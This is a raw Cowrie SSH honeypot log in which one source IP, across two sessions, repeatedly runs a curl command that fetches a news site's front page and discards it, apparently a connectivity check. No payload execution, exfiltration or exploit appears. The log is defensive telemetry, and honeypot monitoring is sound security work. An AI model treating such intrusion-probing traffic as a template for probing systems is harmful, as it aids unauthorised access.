{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.099461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.100986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.104813Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.105796Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.116319Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.125732Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.127711Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.138920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.140654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.146240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.147501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.183015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.184230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.186557Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.187681Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.190531Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.211628Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.222796Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.224232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.228003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.229097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.239051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.249612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.264023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.265535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.269007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.271699Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.275310Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.303926Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.305602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.309789Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.311135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.312250Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.327415Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.332069Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.350319Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.351714Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.354495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.355623Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.360833Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.370725Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.376400Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.389766Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.391073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.395866Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.397838Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.398858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.439382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.440639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.445972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.447088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.450540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.456935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.466046Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.481995Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.487115Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.488201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.492616Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.494033Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.498837Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.522960Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.528505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.529854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.532735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.535349Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.571100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.572388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.575340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.577121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.581071Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.583202Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.601899Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.612694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.614054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.615660Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.619165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.620783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.627664Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.650184Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.658200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.660124Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.663413Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.666482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.667860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
